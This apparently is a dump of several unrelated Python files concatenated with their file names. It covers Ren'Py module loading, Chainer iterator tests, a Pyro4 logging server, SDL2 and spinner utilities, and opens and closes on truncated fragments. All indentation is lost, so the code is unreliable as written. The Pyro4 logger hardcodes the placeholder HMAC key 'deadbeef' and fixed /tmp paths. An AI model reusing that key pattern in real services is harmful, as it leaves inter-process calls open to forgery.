prefixed_name = "/".join("x-" + i for i in name.split("/"))
if prefixed_name in apk.info:
return True
try:
transfn(name)
loadable_cache[name] = True
return True
except:
pass
for _prefix, index in archives:
if name in index:
loadable_cache[name] = True
return True
loadable_cache[name] = False
return False
def loadable(name):
for p in get_prefixes():
if loadable_core(p + name):
return True
return False
def transfn(name):
"""
Tries to translate the name to a file that exists in one of the
searched directories.
"""
name = lower_map.get(name.lower(), name)
if renpy.config.reject_backslash and "\\" in name:
raise Exception("Backslash in filename, use '/' instead: %r" % name)
if isinstance(name, str):
name = name.decode("utf-8")
for d in renpy.config.searchpath:
fn = os.path.join(renpy.config.basedir, d, name)
add_auto(fn)
if os.path.exists(fn):
return fn
raise Exception("Couldn't find file '%s'." % name)
def get_mtime(name):
"""
Returns the time the file m was last modified, or 0 if it
doesn't exist or is archived.
"""
for p in get_prefixes():
try:
fn = transfn(p + name)
return os.path.getmtime(fn)
except:
pass
return 0
################################################################# Module Loading
class RenpyImporter(object):
"""
An importer, that tries to load modules from the places where Ren'Py
searches for data files.
"""
def __init__(self, prefix=""):
self.prefix = ""
def translate(self, fullname, prefix=""):
try:
fn = (prefix + fullname.replace(".", "/")).decode("utf8")
except:
# raise Exception("Could importer-translate %r + %r" % (prefix, fullname))
return None
if loadable(fn + ".py"):
return fn + ".py"
if loadable(fn + "/__init__.py"):
return fn + "/__init__.py"
return None
def find_module(self, fullname, path=None):
if path is not None:
for i in path:
if self.translate(fullname, i):
return RenpyImporter(i)
if self.translate(fullname):
return self
def load_module(self, fullname):
filename = self.translate(fullname, self.prefix)
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__name__ = fullname
mod.__file__ = filename
mod.__loader__ = self
if filename.endswith("__init__.py"):
mod.__path__ = [ filename[:-len("__init__.py")] ]
source = load(filename).read().decode("utf8")
if source and source[0] == u'\ufeff':
source = source[1:]
source = source.encode("raw_unicode_escape")
source = source.replace("\r", "")
code = compile(source, filename, 'exec')
exec code in mod.__dict__
return mod
def get_data(self, filename):
return load(filename).read()
def init_importer():
sys.meta_path.append(RenpyImporter())
def quit_importer():
sys.meta_path.pop()
#################################################################### Auto-Reload
# This is set to True if autoreload hads detected an autoreload is needed.
needs_autoreload = False
# A map from filename to mtime, or None if the file doesn't exist.
auto_mtimes = { }
# The thread used for autoreload.
auto_thread = None
# True if auto_thread should run. False if it should quit.
auto_quit_flag = True
# The lock used by auto_thread.
auto_lock = threading.Condition()
# Used to indicate that this file is blacklisted.
auto_blacklisted = renpy.object.Sentinel("auto_blacklisted")
def auto_mtime(fn):
"""
Gets the mtime of fn, or None if the file does not exist.
"""
try:
return os.path.getmtime(fn)
except:
return None
def add_auto(fn):
"""
Adds fn as a file we watch for changes. If it's mtime changes or the file
starts/stops existing, we trigger a reload.
"""
if not renpy.autoreload:
return
if fn in auto_mtimes:
return
for e in renpy.config.autoreload_blacklist:
if fn.endswith(e):
with auto_lock:
auto_mtimes[fn] = auto_blacklisted
return
mtime = auto_mtime(fn)
with auto_lock:
auto_mtimes[fn] = mtime
def auto_thread_function():
"""
This thread sets need_autoreload when necessary.
"""
global needs_autoreload
while True:
with auto_lock:
auto_lock.wait(1.5)
if auto_quit_flag:
return
items = auto_mtimes.items()
for fn, mtime in items:
if mtime is auto_blacklisted:
continue
if auto_mtime(fn) != mtime:
needs_autoreload = True
def auto_init():
"""
Starts the autoreload thread.
"""
global auto_thread
global auto_quit_flag
global needs_autoreload
needs_autoreload = False
if not renpy.autoreload:
return
auto_quit_flag = False
auto_thread = threading.Thread(target=auto_thread_function)
auto_thread.daemon = True
auto_thread.start()
def auto_quit():
"""
Terminates the autoreload thread.
"""
global auto_quit_flag
if auto_thread is None:
return
auto_quit_flag = True
with auto_lock:
auto_lock.notify_all()
auto_thread.join()
|
behavior_cloning.py
|
"""Author: Brandon Trabucco, Copyright 2019, MIT License"""
import multiprocessing
from cs285.baselines.imitate.behavior_cloning import BehaviorCloning
from gym.envs.mujoco.walker2d import Walker2dEnv
def run_experiment(experiment_id):
BehaviorCloning(
Walker2dEnv,
logging_dir="./walker2d/behavior_cloning/{}".format(experiment_id),
hidden_size=256,
num_hidden_layers=2,
exploration_noise_std=0.1,
expert_policy_ckpt="./walker2d/expert_policy.ckpt",
num_threads=10,
max_path_length=1000,
max_num_steps=1000000,
batch_size=256,
num_epochs=1000,
num_episodes_per_epoch=0,
num_trains_per_epoch=10,
num_episodes_before_train=10,
num_epochs_per_eval=1,
num_episodes_per_eval=10).launch()
if __name__ == "__main__":
num_seeds = 5
for seed in range(num_seeds):
multiprocessing.Process(target=run_experiment, args=(seed,)).start()
|
test_multiprocess_iterator.py
|
from __future__ import division
import copy
import errno
import os
import signal
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import numpy
import six
from chainer import iterators
from chainer import serializer
from chainer import testing
class DummySerializer(serializer.Serializer):
def __init__(self, target):
super(DummySerializer, self).__init__()
self.target = target
def __getitem__(self, key):
raise NotImplementedError
def __call__(self, key, value):
self.target[key] = value
return self.target[key]
class DummyDeserializer(serializer.Deserializer):
def __init__(self, target):
super(DummyDeserializer, self).__init__()
self.target = target
def __getitem__(self, key):
raise NotImplementedError
def __call__(self, key, value):
if value is None:
value = self.target[key]
elif isinstance(value, numpy.ndarray):
numpy.copyto(value, self.target[key])
else:
value = type(value)(numpy.asarray(self.target[key]))
return value
@testing.parameterize(*testing.product({
'n_prefetch': [1, 2],
'shared_mem': [None, 1000000],
'order_sampler': [
None, lambda order, _: numpy.random.permutation(len(order))],
}))
class TestMultiprocessIterator(unittest.TestCase):
def setUp(self):
self.n_processes = 2
self.options = {'n_processes': self.n_processes,
'n_prefetch': self.n_prefetch,
'shared_mem': self.shared_mem}
if self.order_sampler is not None:
self.options.update(
{'order_sampler': self.order_sampler})
def test_iterator_repeat(self):
dataset = [1, 2, 3, 4, 5, 6]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
for i in range(3):
self.assertEqual(it.epoch, i)
self.assertAlmostEqual(it.epoch_detail, i + 0 / 6)
if i == 0:
self.assertIsNone(it.previous_epoch_detail)
else:
self.assertAlmostEqual(it.previous_epoch_detail, i - 2 / 6)
batch1 = it.next()
self.assertEqual(len(batch1), 2)
self.assertIsInstance(batch1, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, i + 2 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 0 / 6)
batch2 = it.next()
self.assertEqual(len(batch2), 2)
self.assertIsInstance(batch2, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, i + 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 2 / 6)
batch3 = it.next()
self.assertEqual(len(batch3), 2)
self.assertIsInstance(batch3, list)
self.assertTrue(it.is_new_epoch)
self.assertEqual(sorted(batch1 + batch2 + batch3), dataset)
self.assertAlmostEqual(it.epoch_detail, i + 6 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 4 / 6)
def test_iterator_list_type(self):
dataset = [[i, numpy.zeros((10,)) + i] for i in range(6)]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
for i in range(3):
self.assertEqual(it.epoch, i)
self.assertAlmostEqual(it.epoch_detail, i)
if i == 0:
self.assertIsNone(it.previous_epoch_detail)
else:
self.assertAlmostEqual(it.previous_epoch_detail, i - 2 / 6)
batches = {}
for j in range(3):
batch = it.next()
self.assertEqual(len(batch), 2)
if j != 2:
self.assertFalse(it.is_new_epoch)
else:
self.assertTrue(it.is_new_epoch)
self.assertAlmostEqual(
it.epoch_detail, (3 * i + j + 1) * 2 / 6)
self.assertAlmostEqual(
it.previous_epoch_detail, (3 * i + j) * 2 / 6)
for x in batch:
self.assertIsInstance(x, list)
self.assertIsInstance(x[1], numpy.ndarray)
batches[x[0]] = x[1]
self.assertEqual(len(batches), len(dataset))
for k, v in six.iteritems(batches):
numpy.testing.assert_allclose(dataset[k][1], v)
def test_iterator_tuple_type(self):
dataset = [(i, numpy.zeros((10,)) + i) for i in range(6)]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
for i in range(3):
self.assertEqual(it.epoch, i)
self.assertAlmostEqual(it.epoch_detail, i)
if i == 0:
self.assertIsNone(it.previous_epoch_detail)
else:
self.assertAlmostEqual(it.previous_epoch_detail, i - 2 / 6)
batches = {}
for j in range(3):
batch = it.next()
self.assertEqual(len(batch), 2)
if j != 2:
self.assertFalse(it.is_new_epoch)
else:
self.assertTrue(it.is_new_epoch)
self.assertAlmostEqual(
it.epoch_detail, (3 * i + j + 1) * 2 / 6)
self.assertAlmostEqual(
it.previous_epoch_detail, (3 * i + j) * 2 / 6)
for x in batch:
self.assertIsInstance(x, tuple)
self.assertIsInstance(x[1], numpy.ndarray)
batches[x[0]] = x[1]
self.assertEqual(len(batches), len(dataset))
for k, v in six.iteritems(batches):
numpy.testing.assert_allclose(dataset[k][1], v)
def test_iterator_dict_type(self):
dataset = [{i: numpy.zeros((10,)) + i} for i in range(6)]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
for i in range(3):
self.assertEqual(it.epoch, i)
self.assertAlmostEqual(it.epoch_detail, i)
if i == 0:
self.assertIsNone(it.previous_epoch_detail)
else:
self.assertAlmostEqual(it.previous_epoch_detail, i - 2 / 6)
batches = {}
for j in range(3):
batch = it.next()
self.assertEqual(len(batch), 2)
if j != 2:
self.assertFalse(it.is_new_epoch)
else:
self.assertTrue(it.is_new_epoch)
self.assertAlmostEqual(
it.epoch_detail, (3 * i + j + 1) * 2 / 6)
self.assertAlmostEqual(
it.previous_epoch_detail, (3 * i + j) * 2 / 6)
for x in batch:
self.assertIsInstance(x, dict)
k = tuple(x)[0]
v = x[k]
self.assertIsInstance(v, numpy.ndarray)
batches[k] = v
self.assertEqual(len(batches), len(dataset))
for k, v in six.iteritems(batches):
x = dataset[k][tuple(dataset[k])[0]]
numpy.testing.assert_allclose(x, v)
def test_iterator_repeat_not_even(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
batches = sum([it.next() for _ in range(5)], [])
self.assertEqual(sorted(batches), sorted(dataset * 2))
def test_iterator_not_repeat(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
batches = sum([it.next() for _ in range(3)], [])
self.assertEqual(sorted(batches), dataset)
for _ in range(2):
self.assertRaises(StopIteration, it.next)
def test_iterator_not_repeat_not_even(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
self.assertAlmostEqual(it.epoch_detail, 0 / 5)
self.assertIsNone(it.previous_epoch_detail)
batch1 = it.next()
self.assertAlmostEqual(it.epoch_detail, 2 / 5)
self.assertAlmostEqual(it.previous_epoch_detail, 0 / 5)
batch2 = it.next()
self.assertAlmostEqual(it.epoch_detail, 4 / 5)
self.assertAlmostEqual(it.previous_epoch_detail, 2 / 5)
batch3 = it.next()
self.assertAlmostEqual(it.epoch_detail, 5 / 5)
self.assertAlmostEqual(it.previous_epoch_detail, 4 / 5)
self.assertRaises(StopIteration, it.next)
self.assertEqual(len(batch3), 1)
self.assertEqual(sorted(batch1 + batch2 + batch3), dataset)
def test_iterator_shuffle_divisible(self):
dataset = list(range(10))
it = iterators.MultiprocessIterator(
dataset, 10, **self.options)
self.assertNotEqual(it.next(), it.next())
def test_iterator_shuffle_nondivisible(self):
dataset = list(range(10))
it = iterators.MultiprocessIterator(
dataset, 3, **self.options)
out = sum([it.next() for _ in range(7)], [])
self.assertNotEqual(out[0:10], out[10:20])
def test_copy_not_repeat(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
copy_it = copy.copy(it)
batches = sum([it.next() for _ in range(3)], [])
self.assertEqual(sorted(batches), dataset)
for _ in range(2):
self.assertRaises(StopIteration, it.next)
it = None
batches = sum([copy_it.next() for _ in range(3)], [])
self.assertEqual(sorted(batches), dataset)
for _ in range(2):
self.assertRaises(StopIteration, copy_it.next)
def test_reset(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
for trial in range(4):
batches = sum([it.next() for _ in range(3)], [])
self.assertEqual(sorted(batches), dataset)
for _ in range(2):
self.assertRaises(StopIteration, it.next)
it.reset()
def test_reset_middle(self):
dataset = [1, 2, 3, 4, 5]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
for trial in range(4):
it.next()
it.reset()
batches = sum([it.next() for _ in range(3)], [])
self.assertEqual(sorted(batches), dataset)
for _ in range(2):
self.assertRaises(StopIteration, it.next)
it.reset()
def test_reset_repeat(self):
dataset = [1, 2, 3, 4]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=True, **self.options)
for trial in range(4):
batches = sum([it.next() for _ in range(4)], [])
self.assertEqual(sorted(batches), sorted(2 * dataset))
it.reset()
def test_unsupported_reset_finalized(self):
dataset = [1, 2, 3, 4]
it = iterators.MultiprocessIterator(
dataset, 2, repeat=False, **self.options)
it.next()
it.next()
it.finalize()
self.assertRaises(NotImplementedError, it.reset)
@testing.parameterize(*testing.product({
'n_prefetch': [1, 2],
'shared_mem': [None, 1000000],
'order_sampler': [
None, lambda order, _: numpy.random.permutation(len(order))],
}))
class TestMultiprocessIteratorSerialize(unittest.TestCase):
def setUp(self):
self.n_processes = 2
self.options = {'n_processes': self.n_processes,
'n_prefetch': self.n_prefetch,
'shared_mem': self.shared_mem}
if self.order_sampler is not None:
self.options.update(
{'shuffle': None, 'order_sampler': self.order_sampler})
def test_iterator_serialize(self):
dataset = [1, 2, 3, 4, 5, 6]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
self.assertEqual(it.epoch, 0)
self.assertAlmostEqual(it.epoch_detail, 0 / 6)
self.assertIsNone(it.previous_epoch_detail)
batch1 = it.next()
self.assertEqual(len(batch1), 2)
self.assertIsInstance(batch1, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 2 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 0 / 6)
batch2 = it.next()
self.assertEqual(len(batch2), 2)
self.assertIsInstance(batch2, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 2 / 6)
target = dict()
it.serialize(DummySerializer(target))
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
it.serialize(DummyDeserializer(target))
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 2 / 6)
batch3 = it.next()
self.assertEqual(len(batch3), 2)
self.assertIsInstance(batch3, list)
self.assertTrue(it.is_new_epoch)
self.assertEqual(sorted(batch1 + batch2 + batch3), dataset)
self.assertAlmostEqual(it.epoch_detail, 6 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 4 / 6)
def test_iterator_serialize_backward_compat(self):
dataset = [1, 2, 3, 4, 5, 6]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
self.assertEqual(it.epoch, 0)
self.assertAlmostEqual(it.epoch_detail, 0 / 6)
self.assertIsNone(it.previous_epoch_detail)
batch1 = it.next()
self.assertEqual(len(batch1), 2)
self.assertIsInstance(batch1, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 2 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 0 / 6)
batch2 = it.next()
self.assertEqual(len(batch2), 2)
self.assertIsInstance(batch2, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 2 / 6)
target = dict()
it.serialize(DummySerializer(target))
# older version does not have previous_epoch_detail
del target['previous_epoch_detail']
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
it.serialize(DummyDeserializer(target))
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 2 / 6)
batch3 = it.next()
self.assertEqual(len(batch3), 2)
self.assertIsInstance(batch3, list)
self.assertTrue(it.is_new_epoch)
self.assertEqual(sorted(batch1 + batch2 + batch3), dataset)
self.assertAlmostEqual(it.epoch_detail, 6 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 4 / 6)
@testing.parameterize(*testing.product({
'n_prefetch': [1, 2],
'shared_mem': [None, 1000000],
}))
class TestMultiprocessIteratorOrderSamplerEpochSize(unittest.TestCase):
def setUp(self):
def order_sampler(order, cur_pos):
return numpy.repeat(numpy.arange(3), 2)
self.n_processes = 2
self.options = {'n_processes': self.n_processes,
'n_prefetch': self.n_prefetch,
'shared_mem': self.shared_mem,
'shuffle': None,
'order_sampler': order_sampler}
def test_iterator_repeat(self):
dataset = [1, 2, 3]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
for i in range(3):
self.assertEqual(it.epoch, i)
self.assertAlmostEqual(it.epoch_detail, i + 0 / 6)
if i == 0:
self.assertIsNone(it.previous_epoch_detail)
else:
self.assertAlmostEqual(it.previous_epoch_detail, i - 2 / 6)
batch1 = it.next()
self.assertEqual(len(batch1), 2)
self.assertIsInstance(batch1, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, i + 2 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 0 / 6)
batch2 = it.next()
self.assertEqual(len(batch2), 2)
self.assertIsInstance(batch2, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, i + 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 2 / 6)
batch3 = it.next()
self.assertEqual(len(batch3), 2)
self.assertIsInstance(batch3, list)
self.assertTrue(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, i + 6 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 4 / 6)
self.assertEqual(
sorted(batch1 + batch2 + batch3), [1, 1, 2, 2, 3, 3])
class _NoSameIndicesOrderSampler(object):
def __init__(self, batchsize):
self.n_call = 0
def __call__(self, current_order, current_pos):
# all batches contain unique indices
remaining = current_order[current_pos:]
first = numpy.setdiff1d(numpy.arange(len(current_order)), remaining)
second = numpy.setdiff1d(numpy.arange(len(current_order)), first)
return numpy.concatenate((first, second))
class TestNoSameIndicesOrderSampler(unittest.TestCase):
def test_no_same_indices_order_sampler(self):
dataset = [1, 2, 3, 4, 5, 6]
batchsize = 5
it = iterators.MultiprocessIterator(
dataset, batchsize,
order_sampler=_NoSameIndicesOrderSampler(batchsize))
for _ in range(5):
batch = it.next()
self.assertEqual(len(numpy.unique(batch)), batchsize)
class _InvalidOrderSampler(object):
def __init__(self):
self.n_call = 0
def __call__(self, _order, _):
order = numpy.arange(len(_order) - self.n_call)
self.n_call += 1
return order
class TestMultiprocessIteratorInvalidOrderSampler(unittest.TestCase):
def test_invalid_order_sampler(self):
dataset = [1, 2, 3, 4, 5, 6]
with self.assertRaises(ValueError):
it = iterators.MultiprocessIterator(
dataset, 6, shuffle=None,
order_sampler=_InvalidOrderSampler())
it.next()
class TestMultiprocessIteratorConcurrency(unittest.TestCase):
def test_finalize_not_deadlock(self):
dataset = numpy.ones((1000, 1000))
it = iterators.MultiprocessIterator(dataset, 10, n_processes=4)
for _ in range(10):
it.next()
t = threading.Thread(target=lambda: it.finalize())
t.daemon = True
t.start()
t.join(5)
deadlock = t.is_alive()
self.assertFalse(deadlock)
class TestMultiprocessIteratorDeterminancy(unittest.TestCase):
def setUp(self):
self._seed = 3141592653
self._random_bak = numpy.random.get_state()
def tearDown(self):
numpy.random.set_state(self._random_bak)
def test_reproduce_same_permutation(self):
dataset = [1, 2, 3, 4, 5, 6]
order_sampler1 = iterators.ShuffleOrderSampler(
numpy.random.RandomState(self._seed))
it1 = iterators.MultiprocessIterator(
dataset, 6, order_sampler=order_sampler1)
order_sampler2 = iterators.ShuffleOrderSampler(
numpy.random.RandomState(self._seed))
it2 = iterators.MultiprocessIterator(
dataset, 6, order_sampler=order_sampler2)
for _ in range(5):
self.assertEqual(it1.next(), it2.next())
@testing.parameterize(*testing.product({
'n_prefetch': [1, 2],
'shared_mem': [None, 1000000],
'order_sampler': [
None, lambda order, _: numpy.random.permutation(len(order))],
}))
class TestMultiprocessIteratorInterruption(unittest.TestCase):
# unless you're debugging tests, this should be false
show_interruption_msg = False
def setUp(self):
self.code_path = None
if not self.show_interruption_msg:
self.nullfd = os.open(os.devnull, os.O_WRONLY)
def tearDown(self):
if not self.show_interruption_msg:
os.close(self.nullfd)
if self.code_path is not None:
os.remove(self.code_path)
def run_code(self, dataset, n_processes, operation):
code_template = """
import os
import random
import sys
import time
from chainer import iterators
# Using `multiprocessing` on Windows Python 2.7 requires
# that the script can be found on `sys.path`.
# See https://bugs.python.org/issue19946
sys.path.append(os.path.dirname(__file__))
class InfiniteWaitDataSet(object):
def __len__(self):
return 1000000
def __getitem__(self, _):
time.sleep(1000000)
infinite_wait = InfiniteWaitDataSet()
class NoWaitDataSet(object):
def __len__(self):
return 1000000
def __getitem__(self, _):
return 0
no_wait = NoWaitDataSet()
if __name__ == '__main__':
if {shared_mem} is not None and {dataset} is infinite_wait:
iterators.MultiprocessIterator._interruption_testing = True
it = iterators.MultiprocessIterator({dataset}, 100,
shuffle={shuffle},
n_processes={n_processes},
n_prefetch={n_prefetch},
shared_mem={shared_mem},
order_sampler={order_sampler})
{operation}
"""
code = code_template.format(dataset=dataset,
shuffle=None,
n_processes=n_processes,
n_prefetch=self.n_prefetch,
shared_mem=self.shared_mem,
order_sampler=self.order_sampler,
operation=operation)
fd, self.code_path = tempfile.mkstemp(suffix='.py')
os.write(fd, six.b(code))
os.close(fd)
if self.shared_mem is not None and dataset is 'infinite_wait':
stdout = subprocess.PIPE
else:
stdout = None
stderr = None if self.show_interruption_msg else self.nullfd
self.p = subprocess.Popen([sys.executable, self.code_path],
stdout=stdout, stderr=stderr)
if stdout is None:
self.child_pids = []
else:
self.child_pids = list(map(int, self.p.stdout.readline().split()))
def send_sigint(self):
# `signal.CTRL_C_EVENT` is also sent to the test process itself.
# See https://docs.python.org/3.6/library/os.html#os.kill
# So we need to wait the signal and ignore it.
# We can NOT ignore the signal by modifying the signal handler here.
# If we temporary ignores the signal, the signal will sent again
# when the signal handler is restored.
# If we ignore the signal permanently, we couldn't interrupt the test.
if os.name == 'nt':
try:
os.kill(self.p.pid, signal.CTRL_C_EVENT)
while True:
pass
except KeyboardInterrupt:
pass
else:
os.kill(self.p.pid, signal.SIGINT)
def killall(self):
# try waiting the root process
# Python 2.7 doesn't have `subprocess.TimeoutExpired`,
# so we couldn't use `p.wait(10)`.
for _ in range(10):
time.sleep(1)
if self.p.poll() is not None:
self.p.wait()
break
pids = [self.p.pid] + self.child_pids
was_alive = False
for pid in pids:
try:
if os.name == 'nt':
os.kill(pid, signal.SIGTERM)
else:
os.kill(pid, signal.SIGKILL)
except OSError as e:
# no such pid (unix)
if e.errno == errno.ESRCH:
pass
# process terminated but its handle remains (Windows)
elif e.errno == errno.EACCES:
pass
# process terminated and its handle erased (Windows)
elif e.errno == errno.EINVAL:
pass
else:
raise
else: # process had existed and successfully killed
was_alive = True
return was_alive
@unittest.skip
def test_interrupt_infinite_wait_batch(self):
# TODO(niboshi): See: https://github.com/chainer/chainer/issues/3383
self.run_code(dataset='infinite_wait',
n_processes=2,
operation='it.next()')
time.sleep(1.5)
self.send_sigint()
self.assertFalse(self.killall())
@unittest.skip
def test_interrupt_no_wait_batch(self):
# TODO(niboshi): See: https://github.com/chainer/chainer/issues/3383
self.run_code(dataset='no_wait',
n_processes=2,
operation='time.sleep(1000)')
time.sleep(1.5)
self.send_sigint()
self.assertFalse(self.killall())
class StallingDataset(object):
def __init__(self, nth, sleep):
self.data = [0, 1, 2, 3, 4]
self.nth = nth
self.sleep = sleep
def __len__(self):
return len(self.data)
def __getitem__(self, i):
if i == self.nth:
time.sleep(self.sleep)
return self.data[i]
@testing.parameterize(*testing.product({
'nth': [0, 1, 2], # A fetch of whatth item will stall?
}))
class TestMultiprocessIteratorStalledDatasetDetection(unittest.TestCase):
def test_stalled_getitem(self):
nth = self.nth
batch_size = 2
sleep = 0.5
timeout = 0.1
dataset = StallingDataset(nth, sleep)
it = iterators.MultiprocessIterator(
dataset, batch_size=batch_size, shuffle=False,
dataset_timeout=timeout, repeat=False)
# TimeoutWarning should be issued.
warning_cls = iterators.MultiprocessIterator.TimeoutWarning
data = []
# No warning until the stalling batch
for i in range(nth // batch_size):
data.append(it.next())
# Warning on the stalling batch
with testing.assert_warns(warning_cls):
data.append(it.next())
# Retrieve data until the end
while True:
try:
data.append(it.next())
except StopIteration:
break
# All data must be retrieved
assert data == [
dataset.data[i * batch_size: (i+1) * batch_size]
for i in range((len(dataset) + batch_size - 1) // batch_size)]
testing.run_module(__name__, __file__)
|
spinner.py
|
import sys
from itertools import cycle
from threading import Event, Thread
from time import sleep
from typing import Any
class Spinner:
phases: Any = cycle(["⣾", "⣷", "⣯", "⣟", "⡿", "⢿", "⣻", "⣽"])
def __init__(self) -> None:
self.stop_running: Any = Event()
self.spin_thread: Any = Thread(target=self.init_spin)
def start(self) -> None:
sys.stdout.write("\033[32m")
self.spin_thread.start()
def stop(self) -> None:
self.stop_running.set()
self.spin_thread.join()
sys.stdout.write("\033[0m")
def init_spin(self) -> None:
while not self.stop_running.is_set():
sys.stdout.write(next(self.phases))
sys.stdout.flush()
sleep(0.1)
sys.stdout.write("\b")
|
plogging.py
|
import Pyro4
Pyro4.config.HMAC_KEY = 'deadbeef'
import os, threading
from Queue import Queue
socket = "/tmp/passe_logger.sock"
uri = "PYRO:logger@./u:%s" % socket
proxy = None
pid = None
def plog(tag, time):
global proxy, pid
if proxy == None or os.getpid() != pid:
pid = os.getpid()
proxy = Pyro4.Proxy(uri)
proxy.log(tag, time)
class LogServer:
def __init__(self):
self.queue = Queue()
def log(self, tag, time):
self.queue.put((tag, time))
def run_log_server():
server = LogServer()
daemon = Pyro4.Daemon(unixsocket=socket)
daemon.register(server, 'logger')
daemon_thread = threading.Thread(target = daemon.requestLoop)
daemon_thread.start()
q = server.queue
logFile = open('/tmp/passe_log', 'w')
count = 0
while(True):
count += 1
item = q.get()
logFile.write('%s,%s\n' % item)
if count % 20 == 0 or item[0] == 'req_finished':
logFile.flush()
os.fsync(logFile.fileno())
q.task_done()
if __name__ == "__main__":
run_log_server()
|
window.py
|
from threading import Thread
import numpy as np
import sdl2
from sdl2 import mouse
import sdl2.ext
from sdl2.ext import window
from sdl2.ext.sprite import Renderer
import ctypes
class Window:
def __init__(self, nbox, title="Visualizer"):
self.size = [1000, 1000]
sdl2.ext.init()
disp_hw = [(self.size[0] // nbox) * nbox] * 2
self.window = sdl2.ext.Window(title, disp_hw)
self.renderer = sdl2.ext.Renderer(self.window)
self.running = True
self.n = nbox
self.boxes = np.zeros([nbox, nbox])
self.x = ctypes.c_int(0)
self.y = ctypes.c_int(0)
self._show()
def _show(self):
self.window.show()
def _hide(self):
self.window.hide()
def _updatedelay(self, value):
if 0 < value < 100:
self.delay = value
def draw_grid(self):
size = self.size
divx = size[0] // self.n
divy = size[1] // self.n
for i in range(1, self.n):
# [x1, y1, x2, y2]
self.renderer.draw_line([i * divx, 0, i * divx, size[0]], sdl2.ext.Color())
self.renderer.draw_line([0, i * divy, size[1], i * divy], sdl2.ext.Color())
def draw_dot(self):
size = self.size
divxh = size[0] // self.n
divyh = size[1] // self.n
for i in range(self.n + 1):
for j in range(self.n + 1):
local = [(divxh // 2) + i * divxh, (divyh // 2) + j * divyh, 3, 3]
# [x1, y2, w, h]
self.renderer.fill([local], sdl2.ext.Color())
def draw_box(self):
size = self.size
divx = size[0] // self.n
divy = size[1] // self.n
for i in range(self.n + 1):
for j in range(self.n + 1):
if i == self.n or j == self.n:
rand = self.boxes[i - 1][j - 1]
else:
rand = self.boxes[i][j]
if rand == 1:
# Blue Color
color = sdl2.ext.Color(0, 0, 255)
elif rand == 2:
# Red Color
color = sdl2.ext.Color(255, 0, 0)
elif rand == 3:
# Green Color
color = sdl2.ext.Color(0, 255, 0)
else:
# Black Color
color = sdl2.ext.Color(0, 0, 0)
self.renderer.fill([i * divx, j * divy, divx, divy], color)
def _render(self, daemon=True):
while self.running and daemon is True:
self.draw_box()
self.draw_grid()
self.draw_dot()
self.renderer.present()
def events(self):
key_state = sdl2.SDL_GetKeyboardState(None)
mouse_state = sdl2.SDL_GetMouseState(ctypes.byref(self.x), ctypes.byref(self.y))
events = sdl2.ext.get_events()
for event in events:
if event.type == sdl2.SDL_QUIT:
self.running = False
return False
# elif event.type == sdl2.SDL_KEYDOWN:
# if key_state[sdl2.SDL_SCANCODE_UP]:
# self._updatedelay(self.delay + 10)
# elif key_state[sdl2.SDL_SCANCODE_DOWN]:
# self._updatedelay(self.delay - 10)
return True
def getMousePos(self):
events = sdl2.ext.get_events()
while True:
for event in events:
if event.type == sdl2.SDL_MOUSEBUTTONDOWN:
break
return self.x.value, self.y.value
def start(self):
rendert = Thread(target=self._render)
rendert.start()
def stop(self):
self.running = False
|
code.py
|
# Released under the MIT License. See LICENSE for details.
#
"""Functionality for formatting, linting, etc. code."""
from __future__ import annotations
import os
import subprocess
import sys
from pathlib import Path
from typing import TYPE_CHECKING
from efrotools.filecache import FileCache
if TYPE_CHECKING:
from typing import Set, List, Dict, Any, Union, Optional
def format_clang_format(projroot: Path, full: bool) -> None:
"""Run clang-format on all of our source code (multithreaded)."""
import time
import concurrent.futures
from multiprocessing import cpu_count
from efrotools import get_files_hash
os.chdir(projroot)
